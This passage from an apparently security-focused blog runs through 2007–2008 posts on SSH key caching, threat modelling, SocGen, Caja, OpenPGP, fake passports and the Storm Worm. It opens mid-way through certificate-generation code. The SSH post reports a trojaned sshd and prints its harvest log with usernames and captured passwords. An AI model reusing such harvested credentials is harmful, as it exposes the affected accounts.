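            .issuer_name(name)                # are the same name
            .public_key(key.public_key())
            .serial_number(x509.random_serial_number())
            .not_valid_before(now)
            .not_valid_after(now + datetime.timedelta(days=365))
            .sign(key, hashes.SHA256())
        )

        # PEM blobs ready to be imported -- the genuinely painful step today:
        cert_pem = cert.public_bytes(serialization.Encoding.PEM)
        key_pem = key.private_bytes(serialization.Encoding.PEM,
                                    serialization.PrivateFormat.PKCS8,
                                    serialization.NoEncryption())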

    Which leaves us inevitably and scarily to our other big concern: Browser hardening against MITB. (How that is done is ... er ... beyond scope of a blog post.) What news there?

    Posted by iang at 12:02 PM | Comments (1) | TrackBack

    April 07, 2008

    An idea for opportunistic public key exchange

    In our ELTEcrypt research group [writes Dani Nagy], we discussed opportunistic public key exchange from a cost-benefit point of view and came up with an important improvement over the existing schemes (e.g. ssh), which, I think, must be advertised as broadly as possible. It may even merit a short paper to some conference, but for now, I would like to ask you to publish it in your blog.

    Opportunistic public key exchange is when two communicating parties perform an unauthenticated key exchange before the first communication session, assume that this key is trustworthy and then only verify that the same party uses the same key every time. This lowers the costs of defense significantly by not imposing authentication on the participants, while at the same time it does not significantly lower the cost of the dominant attack (doing MITM during the first communication session is typically not the dominant attack). Therefore, it is a Pareto-improvement over an authenticated PKI.

    One successful implementation of this principle is ssh. However, it has one major flaw, stemming from misplaced costs: when an ssh host is re-installed or replaced by a new one, the cost of migrating the private key of the host is imposed on the host admin, while most of the costs resulting from not doing so are imposed on the clients.

    In the current arrangement, when a new system is installed, the ssh host generates itself a new key pair. Migrating the old key requires extra work on the system administrator's part. So, he probably won't do it.

    If the host admin fails to migrate the key pair, clients will get a frightening error message that won't let them do their job, until they exert significant effort for removing the "offending" old public key from their key cache. This is their most straightforward solution, which both weakens their security (they lose all protection against MITM) and punishes them for the host admin's mistake.

    This could be improved in the following way: if the client detects that the host's public key has changed, instead of quitting after warning the user, it allows the user to accept the new key temporarily for this one session by hitting "yes" and SENDS AN EMAIL TO THE SYSTEM ADMINISTRATOR.

    Such a scheme metes out punishment where it is due. It does not penalize the client too much for the host admin's mistake, and provides the latter with all the right incentives to do his duty (until he fixes the migration problem, he will be bombarded with emails from all the clients, and the most straightforward solution to his problem is to migrate the key, which also happens to be the right thing to do).
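
    A sketch of the client-side behaviour Dani describes, in Python rather than in ssh itself; the admin address and the local SMTP relay are assumptions for illustration only:

        # On a changed host key: let the user continue for this one session,
        # and send the host's admin an email.
        import smtplib
        from email.message import EmailMessage

        def on_host_key_changed(host: str, old_fp: str, new_fp: str,
                                admin: str = "root@example.org") -> bool:
            answer = input(f"Host key for {host} changed ({old_fp} -> {new_fp}). "
                           "Accept for this session only? (yes/no) ")
            if answer.strip().lower() != "yes":
                return False                      # refuse the connection

            msg = EmailMessage()
            msg["To"] = admin
            msg["From"] = "kcm-client@example.org"
            msg["Subject"] = f"host key for {host} has changed"
            msg.set_content(f"Old fingerprint: {old_fp}\nNew fingerprint: {new_fp}\n"
                            "If you re-installed without migrating the key, please fix it.")
            with smtplib.SMTP("localhost") as relay:
                relay.send_message(msg)           # the admin gets one per client
            return True                           # proceed, but don't update the cache yet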

    As an added benefit, in some attack scenarios, the host admin will learn about an ongoing attack.

    Posted by iang at 02:34 PM | Comments (1) | TrackBack

    March 09, 2008

    The Trouble with Threat Modelling

    We've all heard it a hundred times: what's your threat model? But how many of us have been able to answer that question? Sadly, fewer than we would want, and I myself would not have a confident answer to the question. As writings on threat modelling are few and far between, it is difficult to draw a hard line under the concept. Yet more evidence of gaping holes in the security thinker's credibility.

    Adam Shostack has written a series of blog posts on threat modelling in action at Microsoft (read in reverse order). It's good: readable, and a better starting point, if you need to do it, than anything else I've seen. Here are a couple of plus points (there are more) and a couple of criticisms:

    Surprisingly, the approach is written to follow the practice that it is the job of the developers to do the security work:

    We ask feature teams to participate in threat modeling, rather than having a central team of security experts develop threat models. There’s a large trade-off associated with this choice. The benefit is that everyone thinks about security early. The cost is that we have to be very prescriptive in how we advise people to approach the problem. Some people are great at “think like an attacker,” but others have trouble. Even for the people who are good at it, putting a process in place is great for coverage, assurance and reproducibility. But the experts don’t expose the cracks in a process in the same way as asking everyone to participate.

    What is written between the lines is that the central security team at Microsoft provides a moderator or leader for the process. This is good thinking, as it brings in the experience, but it still makes the team do the work. I wonder how viable this is for general practice? Outside the megacorps where they have made this institutional mindshift happen, would it be possible to ask a security expert to come in, swallow 2 decades of learning, and be a leader of a process, not a doer of a process?

    There are many ramifications of the above discovery, and it is fascinating to watch them bounce around the process. I'll just repeat one here: simplification! Adam hit the obvious problem that if you take the mountain to Mohammad, it should be a small mountain. Developers are employed to write good code, and complex processes just slow that down, and so an aggressive simplification was needed to come up with a very concise model. A more subtle point is that the moderator wants to impart something as well as get through the process, and complexity will kill any retention. Result: one loop on one chart, and one table.

    The posts are not a prescription on how to do the whole process, and indeed in some places, they are tantalisingly light (we can guess that it is internal PR done through a public channel). With that understanding, they represent a great starting point.

    There are two things that I would criticise. One major error, IMHO: Repudiation. This was an invention by PKI-oriented cryptographers in the 1990s or before, seeking yet another marketing point for the so-called digital signature. It happens to be wrong. Not only is the crypto inadequate to the task, the legal and human processes implied by the Repudiation concept are wrong. Not just misinformed or misaligned, they are reversed from reality, and in direct contradiction, so it is no surprise that after a decade of trying, Non-Repudiation has never ever worked in real life.

    It is easy to fix part of the error. Where you see Non-Repudiation, put Auditing (in the sense of logging) or Evidence (if looking for a more juridical flavour). What is a little bit more of a challenge is how to replace "Repudiation" as the name of the attack ... which on reflection is part of the error. The attack alleged as repudiation is problematic, because, before it is proven one way or the other, it is not possible to separate a real attack from a mistake. Then, labelling it as an attack creates a climate of guilty until proven innocent, but without the benefit of evidence tuned to proving innocence. This inevitably leads to injustice which leads to mistrust and finally, (if a fair and open market is in operation) rejection of the technology.

    Instead, think of it as an attack born of confusion or uncertainty. This is a minor issue when inside one administrative or trust boundary, because one person elects to carry the entire risk. But it becomes a bigger risk when crossing into different trust areas. Then, different agents are likely to call a confusing situation by different viewpoints (incentives differ!).

    At this point the confusion develops into a dispute, and that is the real name for the attack. To resolve the dispute, add auditing / logging and evidence. Indeed, signatures such as hashes and digsigs make mighty fine evidence so it might be that a lot of the work can be retained with only a little tweaking.
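
    To make the evidence idea concrete, here is a toy hash-chained log, my own illustration rather than anything from Adam's posts: each entry commits to its predecessor, so records can be produced later in a dispute and checked for quiet alteration.

        # Toy hash-chained log: an entry can't later be altered or dropped
        # without breaking every hash that follows it.
        import hashlib, json, time

        def append_entry(log: list, event: dict) -> dict:
            prev = log[-1]["hash"] if log else "genesis"
            body = {"time": time.time(), "event": event, "prev": prev}
            digest = hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()
            entry = {**body, "hash": digest}
            log.append(entry)
            return entry

        def verify_chain(log: list) -> bool:
            prev = "genesis"
            for entry in log:
                body = {k: entry[k] for k in ("time", "event", "prev")}
                if entry["prev"] != prev:
                    return False
                if entry["hash"] != hashlib.sha256(
                        json.dumps(body, sort_keys=True).encode()).hexdigest():
                    return False
                prev = entry["hash"]
            return True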

    I would then prefer to see the threat-to-property matrix this way:

    Threat --> Security Property
    Spoofing --> Authentication
    Tampering --> Integrity
    Dispute --> Evidence
    Information Disclosure --> Encryption
    Denial of Service --> Availability
    Elevation of Privilege --> Authorisation

    A minor criticism I see is in labelling. I think the whole process is not threat modelling but security modelling. It's a minor thing, which Adam neatly disposes of by saying that arguing about terms is not only pointless but distracts from getting the developers to do the job. I agree. If we end up disposing of the term 'security modelling' then I think that is a small price to pay to get the developers a few steps further forward in secure development.

    Posted by iang at 09:04 AM | Comments (3) | TrackBack

    February 17, 2008

    Say it ain't so? MITM protection on SSH shows its paces...

    For a decade now, SSH has successfully employed a simple opportunistic protection model that solved the shared-key problem. The premise is quite simple: use the information that the user probably knows. It does this by caching keys on first sight, and watching for unexpected changes. This was originally intended to address the theoretical weakness of public key cryptography called MITM or man-in-the-middle.

    Critics of the SSH model, a.k.a. apologists for the PKI model of the Trusted Third Party (certificate authority) have always pointed out that this simply leaves SSH open to a first-time MITM. That is, when some key changes or you first go to a server, it is "unknown" and therefore has to be established with a "leap of faith."

    The SSH defenders claim that we know much more about the other machine, so we know when the key is supposed to change. Therefore, it isn't so much a leap of faith as educated risk-taking. To which the critics respond that we all suffer from click-thru syndrome and we never read those messages, anyway.

    Etc etc, you can see that this argument goes round and round, and will never be solved until we get some data. So far, the data is almost universally against the TTP model (recall phishing, which the high priests of the PKI have not addressed to any serious extent that I've ever seen). About a year or two back, attack attention started on SSH, and so far it has withstood difficulties with no major or widespread results. So much so that we hear very little about it, in contrast to phishing, which is now a 4 year flood of grief.

    After which preamble, I can now report that I have a data point on an attack on SSH! As this is fairly rare, I'm going to report it in fullness, in case it helps. Here goes:

    Yesterday, I ssh'd to a machine, and it said:

    zhukov$ ssh some.where.example.net
    WARNING: RSA key found for host in .ssh/known_hosts:18
    RSA key fingerprint 05:a4:c2:cf:32:cc:e8:4d:86:27:b7:01:9a:9c:02:0f.
    The authenticity of host can't be established but keys
    of different type are already known for this host.
    DSA key fingerprint is 61:43:9e:1f:ae:24:41:99:b5:0c:3f:e2:43:cd:bc:83.
    Are you sure you want to continue connecting (yes/no)?
    

    OK, so I am supposed to know what was going on with that machine, and it was being rebuilt, but I really did not expect SSH to be affected. The ganglia twitch! I asked the sysadm, and he said no, it wasn't him. Hmmm... mighty suspicious.

    I accepted the key and carried on. Does this prove that click-through syndrome is really an irresistible temptation and the Achilles heel of SSH, and even the experienced user will fall for it? Not quite. Firstly, we don't really have a choice as sysadms, we have to get in there, compromise or no compromise, and see. Secondly, it is ok to compromise as long as we know it, we assess the risks and take them. I deliberately chose to go ahead in this case, so it is fair to say that I was warned, and the SSH security model did all that was asked of it.

    Key accepted (yes), and onwards! It immediately came back and said:

    iang@somewhere's password:

    Now the ganglia are doing a ninja turtle act and I'm feeling very strange indeed: The apparent thought of being the victim of an actual real live MITM is doubly delicious, as it is supposed to be as unlikely as dying from shark bite. SSH is not supposed to fall back to passwords, it is supposed to use the keys that were set up earlier. At this point, for some emotional reason I can't further divine, I decided to treat this as a compromise and asked my mate to change my password. He did that, and then I logged in.

    Then we checked. Lo and behold, SSH had been reinstalled completely, and a little bit of investigation revealed what the warped daemon was up to: password harvesting. And, I had a compromised fresh password, whereas my sysadm mates had their real passwords compromised:

    $ cat /dev/saux
    foo@...208 (aendermich) [Fri Feb 15 2008 14:56:05 +0100]
    iang@...152 (changeme!) [Fri Feb 15 2008 15:01:11 +0100]
    nuss@...208 (43Er5z7) [Fri Feb 15 2008 16:10:34 +0100]
    iang@...113 (kash@zza75) [Fri Feb 15 2008 16:23:15 +0100]
    iang@...113 (kash@zza75) [Fri Feb 15 2008 16:35:59 +0100]
    $

    The attacker had replaced the SSH daemon with one that insisted that the users type in their passwords. Luckily, we caught it with only one or two compromises.

    In sum, the SSH security model did its job. This time! The fallback to server-key re-acceptance triggered sufficient suspicion, and the fallback to passwords gave confirmation.

    As a single data point, it's not easy to extrapolate but we can point at which direction it is heading:

    • the model works better than its absence would, for this environment and this threat.
    • This was a node threat (the machine was apparently hacked via dodgy PHP and last week's linux kernel root exploit).
    • the SSH model was originally intended to counter an MITM threat, not a node threat.
    • because SSH prefers keys to passwords (machines being more reliable than humans) my password was protected by the default usage,
    • then, as a side-effect, or by easy extension, the SSH model also protects against a security-mode switch.
    • it would have worked for a real MITM, but only just, as there would only have been the one warning.
    • But frankly, I don't care. The compromise of the node was far more serious,
    • and we know that MITM is the least cost-effective breach of all. There is a high chance of visibility and it is very expensive to run.
    • If we can seduce even a small proportion of breach attacks across to MITM work then we have done a valuable thing indeed.

    In terms of our principles, we can then underscore the following:

    • We are still a long way away from seeing any good data on intercept over-the-wire MITMs. Remember: the threat is on the node. The wire is (relatively) secure.
    • In this current context, SSH's feature to accept passwords, and fallback from key-auth to password-auth, is a weakness. If the password mode had been disabled, then an entire area of attack possibilities would have been evaded. Remember: There is only one mode, and it is secure.
    • The use of the information known to me saved me in this case. This is a good example of how to use the principle of Divide and Conquer. I call this process "bootstrapping relationships into key exchanges" and it is widely used outside the formal security industry.

    All in all, SSH did a good job. Which still leaves us with the rather traumatic job of cleaning up a machine with 3-4 years of crappy PHP applications ... but that's another story.



    For those wondering what to do about today's breach, it seems so far:

    • turn all PHP to secure settings. throw out all old PHP apps that can't cope.
    • find an update for your Linux kernel quickly
    • watch out for SSH replacements and password harvesting
    • prefer SSH keys over passwords. The compromises can be more easily cleaned up by re-generating and re-setting the keys, they don't leapfrog so easily, and they aren't so susceptible to what is sometimes called "social engineering" attacks.
    Posted by iang at 04:26 PM | Comments (7) | TrackBack

    February 02, 2008

    SocGen - the FC solution, the core failure, and some short term hacks...

    Everyone is talking about Société Générale and how they managed to mislay EUR 4.7bn. The current public line is that a rogue trader threw it all away on the market, but some of the more canny people in the business don't buy it.

    One superficial question is how to avoid this dilemma?

    That's a question for financial cryptographers, I say. If we imagine a hard payment system is used for the various derivative trades, we would have to model the trades as two or more back-to-back payments. As they are positions that have to be made then unwound, or cancelled off against each other, this means that each trader is an issuer of subsidiary instruments that are combined into a package that simulates the intent of the trade (theoretical market specialists will recall the zero-coupon bond concept as the basic building block).

    So, Monsieur Kerviel would have to issue his part in the trades, and match them to the issued instruments of his counterparty (whose name we would dearly love to know!). The two issued instruments can be made dependent on each other, an implementation detail we can gloss over today.

    Which brings us to the first part: fraudulent trades to cover other trades would not be possible with proper FC because it is not possible to forge the counterparty's position under triple-entry systems (that being the special magic of triple-entry).
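
    A toy of that triple-entry property, my own sketch rather than anything a bank runs, with Ed25519 from the Python `cryptography` package standing in for the real machinery: a position only exists when trader, counterparty and issuer have all signed the same record, so a counterparty cannot be conjured out of thin air.

        # Toy triple-entry receipt: valid only if trader, counterparty and
        # issuer have all signed the identical record.
        from cryptography.hazmat.primitives.asymmetric import ed25519
        from cryptography.exceptions import InvalidSignature

        class Party:
            def __init__(self, name: str):
                self.name = name
                self.key = ed25519.Ed25519PrivateKey.generate()
            def sign(self, record: bytes) -> bytes:
                return self.key.sign(record)

        def valid_receipt(record: bytes, sigs: dict, parties: dict) -> bool:
            for role in ("trader", "counterparty", "issuer"):
                try:
                    parties[role].key.public_key().verify(sigs[role], record)
                except (KeyError, InvalidSignature):
                    return False
            return True

        trader, counterparty, issuer = Party("Kerviel"), Party("Counterparty"), Party("Issuer")
        parties = {"trader": trader, "counterparty": counterparty, "issuer": issuer}
        record = b"long 1000 index futures, 2008-01-18"

        honest = {"trader": trader.sign(record),
                  "counterparty": counterparty.sign(record),
                  "issuer": issuer.sign(record)}
        forged = {"trader": trader.sign(record),
                  "issuer": issuer.sign(record)}   # no counterparty signature

        assert valid_receipt(record, honest, parties)       # a real, matched trade
        assert not valid_receipt(record, forged, parties)   # a fictitious position fails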

    Higher layer issues are harder, because they are less core rights issues and more human constructs, so they aren't as yet as amenable to cryptographic techniques, but we can use higher layer governance tricks. For example, the size of the position, the alarms and limits, and the creation of accounts (secret or bogus customers). The backoffice people can see into the systems because it is they who manage the issuance servers (ok, that's a presumption). Given the ability to tie down every transaction, we are simply left with the difficult job of correctly analysing every deviation. But, it is at least easier because a whole class of errors is removed.

    Which brings us to the underlying FC question: why not? It was apparent through history, and there are now enough cases to form a pattern, that the reason for the failure of FC was fundamentally that the banks did not want it. If anything, they'd rather you dropped dead on the spot than suggest something that might improve their lives.

    Which leads us to the very troubling question of why banks hate to do it properly. There are many answers, all speculation, and as far as I know, nobody has done research into why banks do not employ the stuff they should if they responded to events as other markets do. Here are some speculative suggestions:

    • banks love complexity
    • more money is made in complexity because the customer pays more, and the margins are higher for higher payments
    • complexity works as a barrier to entry
    • complexity hides funny business, which works as well for naughty banks, tricky managers, and rogue traders. It creates jobs and makes staff numbers look bigger. Indeed it works well for everyone, except outsiders.
    • compliance helps increase complexity, which helps everything else, so compliance is fine as long as all have to suffer the same fate.
    • banks have a tendency to adopt one compatible solution across the board, and cartels are slow to change
    • nobody is rewarded for taking a management risk (only a trading risk)
    • banks are not entrepreneurial or experimental
    • HR processes are steam-age, so there aren't the people to do it even if they wanted to.

    Every one of those reasons is a completely standard malaise which strikes every company, in every industry. The difference is competition; in every other industry, the competition would eat up the poorer players, but in banking, the lack of it keeps the poorer players alive. So the #1 fundamental reason why rogue traders will continue to eat up banks, one by one, is lack of competitive pressures to do any better.

    And of course, all these issues feed into each other. Given all that, it is hard to see how FC will ever make a difference from inside; the only way is from outside, to the extent that challengers find an end-run around the rules for non-competition in banking.

    What then would we propose to the bank to solve the SocGen dilemma as a short term hack? There are two possibilities that might be explored.

    1. Insurance for rogue traders. Employ an external insurer and underwriter to provide a 10bn policy on such events. Then, let the insurer dictate systems & controls. As more knowledge of how to stop the event comes in, the premiums will drop to reward those who have the better protection.

      This works because it is an independent and financially motivated check. It also helps to start the inevitable shift of moving parts of regulation from the current broken 20th century structure over to a free market governance mechanism. That is, it is aligned with the eventual future economic structure.


    2. Separate board charged with governance of risky (banking) assets. As the current board structure of banking means that directors cannot and will not see into the real positions, due to all the above and more, it seems that as time goes on, more and more systematic and systemic conditions will build up. Managing these is more than a full-time job, and more than an ordinary board can do.

      So outsource the whole lot of risk governance to specialists in a separate board-level structure. This structure should have visibility of all accounts, all SPEs, all positions, and should also be the main conduit to the regulator. It has to be equal to the business board, because it has to have the power to make it happen.

      The existing board maintains the business side: HR, markets, products, etc. This would nicely divide the "special" area of banking from the "general" area of business. Then, when things go wrong, it is much easier to identify who to sack, which improves the feedback to the point where it can be useful. It also puts into clearer focus the specialness of banks, with their packaged franchises, regulatory costs and other things.

    Why or how these work is beyond scope of a blog. Indeed, whether they work is a difficult experiment to run, and given the Competition finding above, it might be that we do all this, and still fail. But, I'd still suggest them, as both those ideas can be rolled out in a year, and the current central banking structure has at least another decade to run, and probably two, before the penny drops, and people realise that the regulation is the problem, not the solution.

    (PS: Jim invented the second one!)

    Posted by iang at 06:31 PM | Comments (2) | TrackBack

    January 08, 2008

    UK data breach counts another coup!

    The UK data breach a month or two back counted another victim: one Jeremy Clarkson. The celebrated British "motormouth" thought that nobody should really worry about the loss of the disks, because all the data is widely available anyway. To stress this to the island of nervous nellies, he posted his bank details in the newspaper.

    Back in November, the Government lost two computer discs containing half the population's bank details. Everyone worked themselves into a right old lather about the mistake but I argued we should all calm down because the details in question are to be found on every cheque we hand out every day to every Tom, Dick and cash and carry.

    Unfortunately, some enterprising scammer decided to take him to task over it and signed him up for a contribution to a good charity. (Well, I suppose it's good, all charities and non-profits are good, right?) Now he writes:

    I opened my bank statement this morning to find out that someone has set up a direct debit which automatically takes £500 from my account. I was wrong and I have been punished for my mistake.

    Contrary to what I said at the time, we must go after the idiots who lost the discs and stick cocktail sticks in their eyes until they beg for mercy.

    What can we conclude from this data point of one victim? Lots, as it happens.

    1. That the victimisation was of the *indirect* sort continues to support the thesis that security is a market for silver bullets. That is, the market is about FUD, not security in any objective sense.
    2. (writing for the non-Brit audience here,) Jeremy Clarkson is a comedian. Comments from comedians will do more to set the agenda on security than any 10 incumbents (I hesitate to use more conventional terms). There has to be some pithy business phrase about this, like, when your market is defined by comedians, it's time for the, um, incumbents to change jobs.
    3. Of course, he's right on both counts. Yes, there is nothing much to worry about, individually, because (a) the disks are lost, not stolen, and (b) the data is probably shared so willingly that anyone who wants it already has it. (The political question of whether you could trust the UK government to tie its security shoelaces is another matter entirely...)

      And, yes, he was wrong to stick his neck out and say the truth.


    4. So why didn't the bank simply reverse the transaction? I'll leave that briefly as an exercise to the reader, there being two good reasons that I can think of, after the click.



    a. because he gave implied permission for the transactions by posting his details, and he breached implied terms of service!

    b. because he asked them not to reverse the transaction, as now he gets an opportunity to write another column. Cheap press.

    Hat-tip to JP! And, I've just noticed DigitalMoney's contribution for another take!

    Posted by iang at 04:13 AM | Comments (2) | TrackBack

    November 11, 2007

    Oddly good news week: Google announces a Caps library for Javascript

    Capabilities is one of the few bright spots in theoretical computing. In Internet software terms, caps can be simply implemented as nymous public/private keys (that is, ones without all that PKI baggage). The long and deep tradition of capabilities goes largely unchallenged in the theory literature.
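
    To make that claim concrete, here is a minimal sketch of a capability as a nymous keypair: no names, no certificates, just a registered raw public key, where holding the matching private key is the capability. It assumes the third-party 'cryptography' package and is purely illustrative.

        # A capability as a nymous keypair -- sketch only, assumes the 'cryptography' package.
        from cryptography.hazmat.primitives import serialization
        from cryptography.hazmat.primitives.asymmetric import ed25519

        class Resource:
            """Grants access on proof of holding the private key behind a registered public key."""
            def __init__(self):
                self.holders = set()

            def grant(self, public_bytes: bytes):
                self.holders.add(public_bytes)

            def invoke(self, public_bytes: bytes, signature: bytes, request: bytes) -> str:
                if public_bytes not in self.holders:
                    raise PermissionError("no such capability")
                key = ed25519.Ed25519PublicKey.from_public_bytes(public_bytes)
                key.verify(signature, request)   # raises InvalidSignature if not the holder
                return "performed: " + request.decode()

        # Usage: mint a nymous key, register it as the capability, exercise it.
        alice = ed25519.Ed25519PrivateKey.generate()
        alice_pub = alice.public_key().public_bytes(
            serialization.Encoding.Raw, serialization.PublicFormat.Raw)
        resource = Resource()
        resource.grant(alice_pub)
        print(resource.invoke(alice_pub, alice.sign(b"read ledger"), b"read ledger"))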

    It is heavily challenged in the practical world in two respects: the (human) language is opaque and the ideas are simply not widely deployed. Consider this personal example: I spent many years trying to figure out what caps really was, only to eventually discover that it was what I was doing all along with nymous keys. The same thing happens to most senior FC architects and system designs, as they end up re-inventing caps without knowing it: SSH, Skype, Lynn's x9.59, and Hushmail have all travelled the same path as Gary Howland's nymous design. There's no patent on this stuff, but maybe there should have been, to knock over the ivory tower.

    These real world examples only head in the direction of caps, as they work with existing tools, whereas capabilities is a top-down discipline. Now Ben Laurie has announced that Google has a project to create a Caps approach for Javascript (hat tip to JPM, JQ, EC and RAH :).

    Rather... than modify Javascript, we restrict it to a large subset. This means that a Caja program will run without modification on a standard Javascript interpreter - though it won’t be secure, of course! When it is compiled then, like CaPerl, the result is standard Javascript that enforces capability security. What does this mean? It means that Web apps can embed untrusted third party code without concern that it might compromise either the application’s or the user’s security.

    Caja also means box in Spanish, which is a nice cross-over, as capabilities is like the old sandbox idea of Java applet days. What does this mean, other than the above?

    We could also point to the Microsoft project Cardspace (formerly InfoCard) and claim parallels, as that, at a simplistic level, implements a box for caps as well. Also, the HP research labs have a constellation of caps fans, but it is not clear to me what application channel exists for their work.

    There are then at least two major, well-financed developers pursuing a path guided by theoretical work in secure programming.

    What's up with Sun, Mozilla, Apple, and the application houses, you may well ask! Well, I would say that there is a big difference in views of security. The first-mentioned group, a few tiny isolated teams within behemoths, are pursuing designs, architectures and engineering that are guided by the best of our current knowledge. Practically everyone else believes that security is about fixing bugs after pushing out the latest competitive feature (something I myself promote from time to time).

    Take Sun (for example, as today's whipping boy, rather than Apple or Mozo or the rest of Microsoft, etc).

    They fix all their security bugs, and we are all very grateful for that. However, their overall Java suite becomes more complex as time goes on, and has had few or no changes in the direction of security. Specifically, they've ignored the rather pointed help provided by the caps school (c.f., E, etc). You can see this in J2EE, which is a melting pot of packages and add-ons, so any security it achieves is limited to what we might call bank-level or medium-grade security: only secure if everything else is secure. (Still no IPC on the platform? Crypto still out of control of the application?)

    Which all creates 3 views:

    1. low security, which is characterised by the coolness world of PHP and Linux: shove any package in and smoke it.
    2. medium security, characterised by banks deploying huge numbers of enterprise apps that are all at some point secure as long as the bits around them are secure.
    3. high security, where the applications are engineered for security, from ground up.

    The Internet as a whole is stalled at the 2nd level, and everyone is madly busy fixing security bugs and deploying tools with the word "security" in them. Breaking through the glass ceiling and getting up to high security requires deep changes, and any sign of life in that direction is welcome. Well done Google.

    Posted by iang at 09:51 AM | Comments (4) | TrackBack

    November 08, 2007

    H1: OpenPGP becomes RFC4880. Consider Hypothesis #1: The One True Cipher Suite

    Some good news: after a long hard decade, OpenPGP is now on standards track. That means that it is a standard, more or less, for the rest of us, and the IETF process will make it a "full standard" according to their own process in due course.

    RFC4880 is now OpenPGP and OpenPGP is now RFC4880. Hooray!

    Which finally frees up the OpenPGP community to think what to do next?

    Where do we go from here? That's an important question because OpenPGP provides an important base for a lot of security work, and a lot of security thinking, most of which is good and solid. The OpenPGP web of trust is one of the seminal security ideas, and is used by many products (referenced or not).

    However, it is fair to say that OpenPGP is now out of date. The knowledge was good around the early 1990s, and is ready for an update. (I should point out that this is not as embarrassing as it sounds, as one competitor, PKI/x.509, is about 30 years out of date, deriving its model from pre-Internet telco times, and there is no recognition in that community of even the concept of being out of date.)

    Rising to the challenge, the OpenPGP working group are thinking in terms of remodelling the layers such that there is a core/base component, and on top of that, a major profile, or suite, of algorithms. This will be a long debate about serious software engineering, security and architecture, and it will be the most fun that a software architect can have for the next ten years. In fact, it will be so much fun that it's time to roll out my view, being hypothesis number one:


    H1: The One True Cipher Suite

    In cryptoplumbing, the gravest choices are apparently on the nature of the cipher suite. To include the latest fad algo or not? Instead, I offer you a simple solution. Don't.

    There is one cipher suite, and it is numbered Number 1.

    Ciphersuite #1 is always negotiated as Number 1 in the very first message. It is your choice, your ultimate choice, and your destiny. Pick well.

    If your users are nice to you, promise them Number 2 in two years. If they are not, don't. Either way, do not deliver any more cipher suites for at least 7 years, one for each hypothesis.
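
    Here is what the hypothesis looks like in protocol form, as a minimal sketch: the very first message carries the suite number, there is only suite 1, and anything else is rejected outright. The field names and the contents of suite 1 are invented for illustration; pick your own, and pick well.

        # Sketch of H1: no negotiation list, no fallback, one suite.
        SUITE_1 = {"kex": "x25519", "cipher": "aes-256-gcm", "hash": "sha-256"}   # your one true choice

        def client_hello() -> dict:
            return {"type": "hello", "suite": 1}          # always Number 1, in the very first message

        def server_accept(hello: dict) -> dict:
            if hello.get("suite") != 1:
                raise ValueError("unknown suite -- come back in two years for suite 2")
            return SUITE_1

        print(server_accept(client_hello()))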

    And then it all went to pot...

    We see this with PGP. Version 2 was quite simple and therefore stable -- there was RSA, IDEA, MD5, and some weird padding scheme. That was it. Compatibility arguments were few and far between. Grumbles were limited to the padding scheme and a few other quirks.

    Then came Versions 3-8, and it could be said that the explosion of options and features and variants caused more incompatibility than any standards committee could have done on its own.

    Avoid the Champagne Hangover

    Do your homework up front.

    Pick a good suite of ciphers, ones that are Pareto-Secure, and do your best to make the combination strong. Document the shortfalls and do not worry about them after that. Cut off any idle fingers that can't keep from tweaking. Do not permit people to sell you on the marginal merits of some crazy public key variant or some experimental MAC thing that a cryptographer knocked up over a weekend or some minor foible that allows an attacker to learn your aunty's birth date after asking a million times.

    Resist the temptation. Stick with The One.


    Posted by iang at 11:08 AM | Comments (0) | TrackBack

    October 25, 2007

    My fake passports and me

    Rasika pointed to a serious attempt to research false passports for all of the EU's countries by Panorama, a British soft-investigation TV series:

    I am attending an informal seminar led by a passport dealer, along with six hopefuls who are living illegally in the UK. We are told that all our problems can be solved by a "high quality" Czech passport. It will take just two weeks to obtain and cost a mere £1,500.

    This may already sound surreal enough, but it was just the beginning of my journey across Europe in search of fake passports from all 25 EU member states.

    What's lacking here is hard costs of the passports she actually did obtain. That's why it is soft investigation.

    I am directed to somebody who introduces me to somebody else, and finally I end up face to face with two innocent-looking pensioners. They say that for just 300 euros they can get me a Polish passport in less than 24 hours.

    This deal falls through, but another dealer has delivered Polish and Lithuanian passports, complete with my own photos and two different identities.

    But the breadth of the success makes it worthy of reporting:

    It took me just five months to get 20 fake EU passports. Some of them were of the very best quality and were unlikely to be spotted as fakes by even the most stringent of border controls.

    This is probably a good time to remind FC readers that you can find a long running series on the cost of false identity, taken from news articles that specify actual costs, here in the blog. Also note that on the Panorama show there is a video segment, but it is in a format that I cannot read for some reason.

    Update: in one of the accompanying articles:

    They ranged in price from just #250 to more than #1,500. Some were provided within several days, while others took weeks.

    (Currency is unclear, it was shown as #.) Also, from one of the accompanying articles:

    Police believe they were on the brink of producing 12,000 fake EU passports - potentially earning them £12m, when they were arrested in November 2005. .... Det Insp Nick Downing, who led the investigation, said the passports could have sold for up to £1,000 each.

    Same as FC.

    Posted by iang at 06:59 AM | Comments (5) | TrackBack

    October 05, 2007

    Storm Worm signals major new shift: a Sophisticated Enemy

    I didn't spot it when Peter Gutmann called it the world's biggest supercomputer (I thought he was talking about a game or something ...). Now John Robb pointed to Bruce Schneier who has just published a summary. Here's my paraphrasing:

    • Patience ...
    • Separation of Roles ...
    • Redundant Roles ...
    • No damage to host ...
    • p2p communications to control nodes ...
    • morphing of standard signatures (DNS, code) ...
    • probing (in military recon terms) past standard defences ...
    • knowledge of the victim's weaknesses ...
    • suppression of the enemy's recon ...

    Bruce Schneier reports that the anti-virus companies are pretty much powerless, and runs through a series of possible defences. I can think of a few too, and I'm sure you can as well. No doubt the world's security experts (cough) will spend a lot of time on this question.

    But, step back. Look at the big picture. We've seen all these things before. Those serious architects in our world (you know who you are) have even built these systems before.

    But: we've never seen the combination of these tactics in an attack.

    This speaks to a new level of sophistication in the enemy. In the past, all the elements were basic. Better than script kiddie, but in that area. What we had was industrialisation of the phishing industry, a few years back, which spoke to an increasing level of capital and management involved.

    Now we have some serious architects involved. This is in line with the great successes of computer science: Unix, the Internet, Skype all achieved this level of sophistication in engineering, with real results. I tried with Ricardo, Lynn&Anne tried with x9.59. Others as well, like James and the Digicash crew. Mojo, Bittorrent and the p2p crowd tried it too.

    So we have a new result: the enemy now has architects as good as our best.

    As a side-issue, and as predicted, we can also see the efforts of the less-well architected groups shown for what they are. Takedown is the best strategy that the security-shy banks have against phishing, and that's pretty much a dead duck against the above enemy. (Banks with security goals have moved to SMS authentication of transactions, sometimes known as two channel, and that will still work.)

    But that's a mere throwaway for the users. Back to the atomic discussion of architecture. This is an awesome result. In warfare, one of the dictums is, "know yourself and win half your battles. Know your enemy and win 99 of 100 battles."

